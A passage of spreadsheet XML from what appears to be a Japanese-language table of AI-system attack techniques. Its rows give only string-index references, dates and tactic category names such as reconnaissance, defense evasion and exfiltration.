      <c r="E12" s="16" t="s">
        <v>27</v>
      </c>
      <c r="F12" s="13">
        <v>44329</v>
      </c>
      <c r="G12" s="13">
        <v>45728</v>
      </c>
      <c r="H12" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I12" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="13" spans="1:9" ht="120" x14ac:dyDescent="0.2">
      <c r="A13" s="10" t="s">
        <v>28</v>
      </c>
      <c r="B13" s="11" t="s">
        <v>29</v>
      </c>
      <c r="C13" s="10" t="s">
        <v>500</v>
      </c>
      <c r="D13" s="11" t="s">
        <v>501</v>
      </c>
      <c r="E13" s="12" t="s">
        <v>30</v>
      </c>
      <c r="F13" s="13">
        <v>44329</v>
      </c>
      <c r="G13" s="13">
        <v>45756</v>
      </c>
      <c r="H13" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I13" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="14" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A14" s="29" t="s">
        <v>835</v>
      </c>
      <c r="B14" s="11" t="s">
        <v>836</v>
      </c>
      <c r="C14" s="26" t="s">
        <v>935</v>
      </c>
      <c r="D14" s="21" t="s">
        <v>936</v>
      </c>
      <c r="E14" s="12" t="s">
        <v>837</v>
      </c>
      <c r="F14" s="13">
        <v>45930</v>
      </c>
      <c r="G14" s="13">
        <v>45930</v>
      </c>
      <c r="H14" s="10" t="s">
        <v>55</v>
      </c>
      <c r="I14" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="15" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A15" s="10" t="s">
        <v>31</v>
      </c>
      <c r="B15" s="11" t="s">
        <v>32</v>
      </c>
      <c r="C15" s="15" t="s">
        <v>502</v>
      </c>
      <c r="D15" s="15" t="s">
        <v>503</v>
      </c>
      <c r="E15" s="12" t="s">
        <v>33</v>
      </c>
      <c r="F15" s="13">
        <v>44329</v>
      </c>
      <c r="G15" s="13">
        <v>45965</v>
      </c>
      <c r="H15" s="10" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>偵察</v>
      </c>
      <c r="I15" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="16" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A16" s="10" t="s">
        <v>35</v>
      </c>
      <c r="B16" s="11" t="s">
        <v>36</v>
      </c>
      <c r="C16" s="15" t="s">
        <v>504</v>
      </c>
      <c r="D16" s="11" t="s">
        <v>505</v>
      </c>
      <c r="E16" s="12" t="s">
        <v>37</v>
      </c>
      <c r="F16" s="13">
        <v>44329</v>
      </c>
      <c r="G16" s="13">
        <v>45756</v>
      </c>
      <c r="H16" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I16" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="17" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A17" s="10" t="s">
        <v>38</v>
      </c>
      <c r="B17" s="11" t="s">
        <v>39</v>
      </c>
      <c r="C17" s="10" t="s">
        <v>506</v>
      </c>
      <c r="D17" s="21" t="s">
        <v>937</v>
      </c>
      <c r="E17" s="12" t="s">
        <v>40</v>
      </c>
      <c r="F17" s="13">
        <v>45224</v>
      </c>
      <c r="G17" s="13">
        <v>45756</v>
      </c>
      <c r="H17" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I17" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="18" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A18" s="29" t="s">
        <v>838</v>
      </c>
      <c r="B18" s="11" t="s">
        <v>839</v>
      </c>
      <c r="C18" s="26" t="s">
        <v>930</v>
      </c>
      <c r="D18" s="21" t="s">
        <v>938</v>
      </c>
      <c r="E18" s="12" t="s">
        <v>840</v>
      </c>
      <c r="F18" s="13">
        <v>45958</v>
      </c>
      <c r="G18" s="13">
        <v>45965</v>
      </c>
      <c r="H18" s="10" t="s">
        <v>51</v>
      </c>
      <c r="I18" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="19" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A19" s="10" t="s">
        <v>41</v>
      </c>
      <c r="B19" s="11" t="s">
        <v>42</v>
      </c>
      <c r="C19" s="10" t="s">
        <v>507</v>
      </c>
      <c r="D19" s="15" t="s">
        <v>508</v>
      </c>
      <c r="E19" s="16" t="s">
        <v>43</v>
      </c>
      <c r="F19" s="13">
        <v>44329</v>
      </c>
      <c r="G19" s="13">
        <v>44329</v>
      </c>
      <c r="H19" s="10" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I19" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="20" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A20" s="10" t="s">
        <v>45</v>
      </c>
      <c r="B20" s="11" t="s">
        <v>46</v>
      </c>
      <c r="C20" s="10" t="s">
        <v>509</v>
      </c>
      <c r="D20" s="15" t="s">
        <v>510</v>
      </c>
      <c r="E20" s="12" t="s">
        <v>47</v>
      </c>
      <c r="F20" s="13">
        <v>44329</v>
      </c>
      <c r="G20" s="13">
        <v>45303</v>
      </c>
      <c r="H20" s="10" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I20" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="21" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A21" s="10" t="s">
        <v>48</v>
      </c>
      <c r="B21" s="11" t="s">
        <v>49</v>
      </c>
      <c r="C21" s="10" t="s">
        <v>511</v>
      </c>
      <c r="D21" s="11" t="s">
        <v>512</v>
      </c>
      <c r="E21" s="12" t="s">
        <v>50</v>
      </c>
      <c r="F21" s="13">
        <v>45728</v>
      </c>
      <c r="G21" s="13">
        <v>45728</v>
      </c>
      <c r="H21" s="10" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I21" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="22" spans="1:9" ht="166" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A22" s="10" t="s">
        <v>52</v>
      </c>
      <c r="B22" s="11" t="s">
        <v>53</v>
      </c>
      <c r="C22" s="10" t="s">
        <v>513</v>
      </c>
      <c r="D22" s="21" t="s">
        <v>931</v>
      </c>
      <c r="E22" s="12" t="s">
        <v>54</v>
      </c>
      <c r="F22" s="13">
        <v>45761</v>
      </c>
      <c r="G22" s="13">
        <v>45761</v>
      </c>
      <c r="H22" s="10" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I22" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="23" spans="1:9" ht="105" x14ac:dyDescent="0.2">
      <c r="A23" s="10" t="s">
        <v>56</v>
      </c>
      <c r="B23" s="11" t="s">
        <v>57</v>
      </c>
      <c r="C23" s="15" t="s">
        <v>514</v>
      </c>
      <c r="D23" s="15" t="s">
        <v>515</v>
      </c>
      <c r="E23" s="12" t="s">
        <v>58</v>
      </c>
      <c r="F23" s="13">
        <v>44985</v>
      </c>
      <c r="G23" s="13">
        <v>45211</v>
      </c>
      <c r="H23" s="10" t="str">
        <f>'tactics (ja)'!$C$9</f>
        <v>実行</v>
      </c>
      <c r="I23" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="24" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A24" s="10" t="s">
        <v>59</v>
      </c>
      <c r="B24" s="11" t="s">
        <v>60</v>
      </c>
      <c r="C24" s="15" t="s">
        <v>516</v>
      </c>
      <c r="D24" s="15" t="s">
        <v>517</v>
      </c>
      <c r="E24" s="12" t="s">
        <v>61</v>
      </c>
      <c r="F24" s="13">
        <v>44329</v>
      </c>
      <c r="G24" s="13">
        <v>44329</v>
      </c>
      <c r="H24" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I24" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="25" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A25" s="10" t="s">
        <v>62</v>
      </c>
      <c r="B25" s="11" t="s">
        <v>63</v>
      </c>
      <c r="C25" s="10" t="s">
        <v>518</v>
      </c>
      <c r="D25" s="11" t="s">
        <v>519</v>
      </c>
      <c r="E25" s="12" t="s">
        <v>64</v>
      </c>
      <c r="F25" s="13">
        <v>45393</v>
      </c>
      <c r="G25" s="13">
        <v>45393</v>
      </c>
      <c r="H25" s="10" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I25" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="26" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A26" s="10" t="s">
        <v>65</v>
      </c>
      <c r="B26" s="11" t="s">
        <v>66</v>
      </c>
      <c r="C26" s="10" t="s">
        <v>520</v>
      </c>
      <c r="D26" s="11" t="s">
        <v>521</v>
      </c>
      <c r="E26" s="12" t="s">
        <v>67</v>
      </c>
      <c r="F26" s="13">
        <v>45761</v>
      </c>
      <c r="G26" s="13">
        <v>45761</v>
      </c>
      <c r="H26" s="10" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I26" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="27" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A27" s="10" t="s">
        <v>68</v>
      </c>
      <c r="B27" s="11" t="s">
        <v>69</v>
      </c>
      <c r="C27" s="15" t="s">
        <v>522</v>
      </c>
      <c r="D27" s="15" t="s">
        <v>523</v>
      </c>
      <c r="E27" s="12" t="s">
        <v>70</v>
      </c>
      <c r="F27" s="13">
        <v>44329</v>
      </c>
      <c r="G27" s="13">
        <v>45756</v>
      </c>
      <c r="H27" s="10" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I27" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="28" spans="1:9" ht="120" x14ac:dyDescent="0.2">
      <c r="A28" s="10" t="s">
        <v>71</v>
      </c>
      <c r="B28" s="11" t="s">
        <v>72</v>
      </c>
      <c r="C28" s="15" t="s">
        <v>524</v>
      </c>
      <c r="D28" s="15" t="s">
        <v>525</v>
      </c>
      <c r="E28" s="12" t="s">
        <v>73</v>
      </c>
      <c r="F28" s="13">
        <v>44329</v>
      </c>
      <c r="G28" s="13">
        <v>45756</v>
      </c>
      <c r="H28" s="10" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I28" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="29" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A29" s="10" t="s">
        <v>74</v>
      </c>
      <c r="B29" s="11" t="s">
        <v>75</v>
      </c>
      <c r="C29" s="15" t="s">
        <v>526</v>
      </c>
      <c r="D29" s="15" t="s">
        <v>527</v>
      </c>
      <c r="E29" s="12" t="s">
        <v>76</v>
      </c>
      <c r="F29" s="13">
        <v>44329</v>
      </c>
      <c r="G29" s="13">
        <v>45756</v>
      </c>
      <c r="H29" s="10" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I29" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="30" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A30" s="29" t="s">
        <v>844</v>
      </c>
      <c r="B30" s="11" t="s">
        <v>845</v>
      </c>
      <c r="C30" s="21" t="s">
        <v>908</v>
      </c>
      <c r="D30" s="21" t="s">
        <v>939</v>
      </c>
      <c r="E30" s="12" t="s">
        <v>846</v>
      </c>
      <c r="F30" s="13">
        <v>45930</v>
      </c>
      <c r="G30" s="13">
        <v>45943</v>
      </c>
      <c r="H30" s="10" t="s">
        <v>336</v>
      </c>
      <c r="I30" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="31" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A31" s="10" t="s">
        <v>77</v>
      </c>
      <c r="B31" s="11" t="s">
        <v>78</v>
      </c>
      <c r="C31" s="10" t="s">
        <v>528</v>
      </c>
      <c r="D31" s="15" t="s">
        <v>529</v>
      </c>
      <c r="E31" s="12" t="s">
        <v>79</v>
      </c>
      <c r="F31" s="13">
        <v>44329</v>
      </c>
      <c r="G31" s="13">
        <v>45756</v>
      </c>
      <c r="H31" s="10" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I31" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="32" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A32" s="29" t="s">
        <v>841</v>
      </c>
      <c r="B32" s="11" t="s">
        <v>842</v>
      </c>
      <c r="C32" s="26" t="s">
        <v>909</v>
      </c>
      <c r="D32" s="21" t="s">
        <v>940</v>
      </c>
      <c r="E32" s="12" t="s">
        <v>843</v>
      </c>
      <c r="F32" s="13">
        <v>45930</v>
      </c>
      <c r="G32" s="13">
        <v>45965</v>
      </c>
      <c r="H32" s="10" t="s">
        <v>5</v>
      </c>
      <c r="I32" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="33" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A33" s="10" t="s">
        <v>80</v>
      </c>
      <c r="B33" s="11" t="s">
        <v>81</v>
      </c>
      <c r="C33" s="15" t="s">
        <v>530</v>
      </c>
      <c r="D33" s="15" t="s">
        <v>531</v>
      </c>
      <c r="E33" s="12" t="s">
        <v>82</v>
      </c>
      <c r="F33" s="13">
        <v>44585</v>
      </c>
      <c r="G33" s="13">
        <v>44944</v>
      </c>
      <c r="H33" s="10" t="str">
        <f>'tactics (ja)'!$C$4</f>
        <v>収集</v>
      </c>
      <c r="I33" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="34" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A34" s="10" t="s">
        <v>83</v>
      </c>
      <c r="B34" s="11" t="s">
        <v>84</v>
      </c>
      <c r="C34" s="10" t="s">
        <v>532</v>
      </c>
      <c r="D34" s="15" t="s">
        <v>533</v>
      </c>
      <c r="E34" s="12" t="s">
        <v>85</v>
      </c>
      <c r="F34" s="13">
        <v>44329</v>
      </c>
      <c r="G34" s="13">
        <v>44944</v>
      </c>
      <c r="H34" s="10" t="str">
        <f>'tactics (ja)'!$C$4</f>
        <v>収集</v>
      </c>
      <c r="I34" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="35" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A35" s="10" t="s">
        <v>86</v>
      </c>
      <c r="B35" s="11" t="s">
        <v>87</v>
      </c>
      <c r="C35" s="10" t="s">
        <v>534</v>
      </c>
      <c r="D35" s="15" t="s">
        <v>535</v>
      </c>
      <c r="E35" s="12" t="s">
        <v>88</v>
      </c>
      <c r="F35" s="13">
        <v>44329</v>
      </c>
      <c r="G35" s="13">
        <v>44329</v>
      </c>
      <c r="H35" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I35" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="36" spans="1:9" ht="90" x14ac:dyDescent="0.2">
      <c r="A36" s="29" t="s">
        <v>847</v>
      </c>
      <c r="B36" s="11" t="s">
        <v>848</v>
      </c>
      <c r="C36" s="26" t="s">
        <v>910</v>
      </c>
      <c r="D36" s="21" t="s">
        <v>941</v>
      </c>
      <c r="E36" s="12" t="s">
        <v>849</v>
      </c>
      <c r="F36" s="13">
        <v>45965</v>
      </c>
      <c r="G36" s="13">
        <v>45966</v>
      </c>
      <c r="H36" s="10" t="s">
        <v>51</v>
      </c>
      <c r="I36" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="37" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A37" s="10" t="s">
        <v>89</v>
      </c>
      <c r="B37" s="11" t="s">
        <v>90</v>
      </c>
      <c r="C37" s="10" t="s">
        <v>536</v>
      </c>
      <c r="D37" s="15" t="s">
        <v>537</v>
      </c>
      <c r="E37" s="16" t="s">
        <v>91</v>
      </c>
      <c r="F37" s="13">
        <v>44329</v>
      </c>
      <c r="G37" s="13">
        <v>45756</v>
      </c>
      <c r="H37" s="10" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I37" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="38" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A38" s="10" t="s">
        <v>92</v>
      </c>
      <c r="B38" s="11" t="s">
        <v>93</v>
      </c>
      <c r="C38" s="10" t="s">
        <v>538</v>
      </c>
      <c r="D38" s="15" t="s">
        <v>539</v>
      </c>
      <c r="E38" s="12" t="s">
        <v>94</v>
      </c>
      <c r="F38" s="13">
        <v>45224</v>
      </c>
      <c r="G38" s="13">
        <v>45756</v>
      </c>
      <c r="H38" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I38" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="39" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A39" s="10" t="s">
        <v>95</v>
      </c>
      <c r="B39" s="11" t="s">
        <v>96</v>
      </c>
      <c r="C39" s="10" t="s">
        <v>540</v>
      </c>
      <c r="D39" s="15" t="s">
        <v>541</v>
      </c>
      <c r="E39" s="12" t="s">
        <v>97</v>
      </c>
      <c r="F39" s="13">
        <v>45224</v>
      </c>
      <c r="G39" s="13">
        <v>45224</v>
      </c>
      <c r="H39" s="10" t="str">
        <f>'tactics (ja)'!$C$9</f>
        <v>実行</v>
      </c>
      <c r="I39" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="40" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A40" s="29" t="s">
        <v>850</v>
      </c>
      <c r="B40" s="11" t="s">
        <v>851</v>
      </c>
      <c r="C40" s="26" t="s">
        <v>911</v>
      </c>
      <c r="D40" s="21" t="s">
        <v>942</v>
      </c>
      <c r="E40" s="12" t="s">
        <v>852</v>
      </c>
      <c r="F40" s="13">
        <v>45930</v>
      </c>
      <c r="G40" s="13">
        <v>45930</v>
      </c>
      <c r="H40" s="10" t="s">
        <v>55</v>
      </c>
      <c r="I40" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="41" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A41" s="10" t="s">
        <v>98</v>
      </c>
      <c r="B41" s="11" t="s">
        <v>99</v>
      </c>
      <c r="C41" s="10" t="s">
        <v>542</v>
      </c>
      <c r="D41" s="15" t="s">
        <v>543</v>
      </c>
      <c r="E41" s="12" t="s">
        <v>100</v>
      </c>
      <c r="F41" s="13">
        <v>44329</v>
      </c>
      <c r="G41" s="13">
        <v>45756</v>
      </c>
      <c r="H41" s="10" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I41" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="42" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A42" s="10" t="s">
        <v>101</v>
      </c>
      <c r="B42" s="11" t="s">
        <v>102</v>
      </c>
      <c r="C42" s="15" t="s">
        <v>544</v>
      </c>
      <c r="D42" s="15" t="s">
        <v>545</v>
      </c>
      <c r="E42" s="12" t="s">
        <v>103</v>
      </c>
      <c r="F42" s="13">
        <v>44329</v>
      </c>
      <c r="G42" s="13">
        <v>45756</v>
      </c>
      <c r="H42" s="10" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I42" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="43" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A43" s="10" t="s">
        <v>104</v>
      </c>
      <c r="B43" s="11" t="s">
        <v>105</v>
      </c>
      <c r="C43" s="15" t="s">
        <v>546</v>
      </c>
      <c r="D43" s="15" t="s">
        <v>547</v>
      </c>
      <c r="E43" s="12" t="s">
        <v>106</v>
      </c>
      <c r="F43" s="13">
        <v>44329</v>
      </c>
      <c r="G43" s="13">
        <v>45756</v>
      </c>
      <c r="H43" s="10" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I43" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="44" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A44" s="10" t="s">
        <v>107</v>
      </c>
      <c r="B44" s="11" t="s">
        <v>108</v>
      </c>
      <c r="C44" s="10" t="s">
        <v>548</v>
      </c>
      <c r="D44" s="11" t="s">
        <v>549</v>
      </c>
      <c r="E44" s="12" t="s">
        <v>109</v>
      </c>
      <c r="F44" s="13">
        <v>45728</v>
      </c>
      <c r="G44" s="13">
        <v>45728</v>
      </c>
      <c r="H44" s="10" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I44" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="45" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A45" s="10" t="s">
        <v>110</v>
      </c>
      <c r="B45" s="11" t="s">
        <v>111</v>
      </c>
      <c r="C45" s="10" t="s">
        <v>550</v>
      </c>
      <c r="D45" s="11" t="s">
        <v>551</v>
      </c>
      <c r="E45" s="12" t="s">
        <v>112</v>
      </c>
      <c r="F45" s="13">
        <v>45728</v>
      </c>
      <c r="G45" s="13">
        <v>45961</v>
      </c>
      <c r="H45" s="10" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I45" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="46" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A46" s="10" t="s">
        <v>113</v>
      </c>
      <c r="B46" s="11" t="s">
        <v>114</v>
      </c>
      <c r="C46" s="10" t="s">
        <v>552</v>
      </c>
      <c r="D46" s="11" t="s">
        <v>553</v>
      </c>
      <c r="E46" s="12" t="s">
        <v>115</v>
      </c>
      <c r="F46" s="13">
        <v>45728</v>
      </c>
      <c r="G46" s="13">
        <v>45728</v>
      </c>
      <c r="H46" s="10" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I46" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="47" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A47" s="10" t="s">
        <v>116</v>
      </c>
      <c r="B47" s="11" t="s">
        <v>117</v>
      </c>
      <c r="C47" s="10" t="s">
        <v>554</v>
      </c>
      <c r="D47" s="11" t="s">
        <v>555</v>
      </c>
      <c r="E47" s="12" t="s">
        <v>118</v>
      </c>
      <c r="F47" s="13">
        <v>45728</v>
      </c>
      <c r="G47" s="13">
        <v>45728</v>
      </c>
      <c r="H47" s="10" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I47" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="48" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A48" s="10" t="s">
        <v>119</v>
      </c>
      <c r="B48" s="11" t="s">
        <v>120</v>
      </c>
      <c r="C48" s="10" t="s">
        <v>556</v>
      </c>
      <c r="D48" s="11" t="s">
        <v>557</v>
      </c>
      <c r="E48" s="12" t="s">
        <v>121</v>
      </c>
      <c r="F48" s="13">
        <v>45763</v>
      </c>
      <c r="G48" s="13">
        <v>45764</v>
      </c>
      <c r="H48" s="10" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I48" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="49" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A49" s="10" t="s">
        <v>122</v>
      </c>
      <c r="B49" s="11" t="s">
        <v>123</v>
      </c>
      <c r="C49" s="10" t="s">
        <v>558</v>
      </c>
      <c r="D49" s="11" t="s">
        <v>559</v>
      </c>
      <c r="E49" s="12" t="s">
        <v>124</v>
      </c>
      <c r="F49" s="13">
        <v>45756</v>
      </c>
      <c r="G49" s="13">
        <v>45756</v>
      </c>
      <c r="H49" s="10" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I49" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="50" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A50" s="29" t="s">
        <v>853</v>
      </c>
      <c r="B50" s="11" t="s">
        <v>854</v>
      </c>
      <c r="C50" s="26" t="s">
        <v>913</v>
      </c>
      <c r="D50" s="21" t="s">
        <v>914</v>
      </c>
      <c r="E50" s="12" t="s">
        <v>855</v>
      </c>
      <c r="F50" s="13">
        <v>45930</v>
      </c>
      <c r="G50" s="13">
        <v>45930</v>
      </c>
      <c r="H50" s="10" t="s">
        <v>55</v>
      </c>
      <c r="I50" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="51" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A51" s="10" t="s">
        <v>125</v>
      </c>
      <c r="B51" s="11" t="s">
        <v>126</v>
      </c>
      <c r="C51" s="10" t="s">
        <v>560</v>
      </c>
      <c r="D51" s="15" t="s">
        <v>561</v>
      </c>
      <c r="E51" s="16" t="s">
        <v>127</v>
      </c>
      <c r="F51" s="13">
        <v>44329</v>
      </c>
      <c r="G51" s="13">
        <v>45756</v>
      </c>
      <c r="H51" s="10" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I51" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="52" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A52" s="10" t="s">
        <v>128</v>
      </c>
      <c r="B52" s="11" t="s">
        <v>129</v>
      </c>
      <c r="C52" s="10" t="s">
        <v>562</v>
      </c>
      <c r="D52" s="11" t="s">
        <v>563</v>
      </c>
      <c r="E52" s="12" t="s">
        <v>130</v>
      </c>
      <c r="F52" s="13">
        <v>45728</v>
      </c>
      <c r="G52" s="13">
        <v>45728</v>
      </c>
      <c r="H52" s="10" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I52" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="53" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A53" s="10" t="s">
        <v>131</v>
      </c>
      <c r="B53" s="11" t="s">
        <v>132</v>
      </c>
      <c r="C53" s="15" t="s">
        <v>564</v>
      </c>
      <c r="D53" s="11" t="s">
        <v>565</v>
      </c>
      <c r="E53" s="16" t="s">
        <v>133</v>
      </c>
      <c r="F53" s="13">
        <v>44585</v>
      </c>
      <c r="G53" s="13">
        <v>44944</v>
      </c>
      <c r="H53" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I53" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="54" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A54" s="10" t="s">
        <v>134</v>
      </c>
      <c r="B54" s="11" t="s">
        <v>135</v>
      </c>
      <c r="C54" s="10" t="s">
        <v>566</v>
      </c>
      <c r="D54" s="11" t="s">
        <v>567</v>
      </c>
      <c r="E54" s="12" t="s">
        <v>136</v>
      </c>
      <c r="F54" s="13">
        <v>44329</v>
      </c>
      <c r="G54" s="13">
        <v>45965</v>
      </c>
      <c r="H54" s="10" t="str">
        <f>'tactics (ja)'!$C$7&amp;"、"&amp;'tactics (ja)'!$C$11&amp;"、"&amp;'tactics (ja)'!$C$12</f>
        <v>防御策の回避、影響、初期アクセス</v>
      </c>
      <c r="I54" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="55" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A55" s="29" t="s">
        <v>856</v>
      </c>
      <c r="B55" s="11" t="s">
        <v>857</v>
      </c>
      <c r="C55" s="26" t="s">
        <v>915</v>
      </c>
      <c r="D55" s="21" t="s">
        <v>943</v>
      </c>
      <c r="E55" s="12" t="s">
        <v>858</v>
      </c>
      <c r="F55" s="13">
        <v>45930</v>
      </c>
      <c r="G55" s="13">
        <v>45930</v>
      </c>
      <c r="H55" s="10" t="s">
        <v>140</v>
      </c>
      <c r="I55" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="56" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A56" s="10" t="s">
        <v>137</v>
      </c>
      <c r="B56" s="11" t="s">
        <v>138</v>
      </c>
      <c r="C56" s="10" t="s">
        <v>568</v>
      </c>
      <c r="D56" s="11" t="s">
        <v>569</v>
      </c>
      <c r="E56" s="12" t="s">
        <v>139</v>
      </c>
      <c r="F56" s="13">
        <v>44329</v>
      </c>
      <c r="G56" s="13">
        <v>45756</v>
      </c>
      <c r="H56" s="10" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I56" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="57" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A57" s="10" t="s">
        <v>141</v>
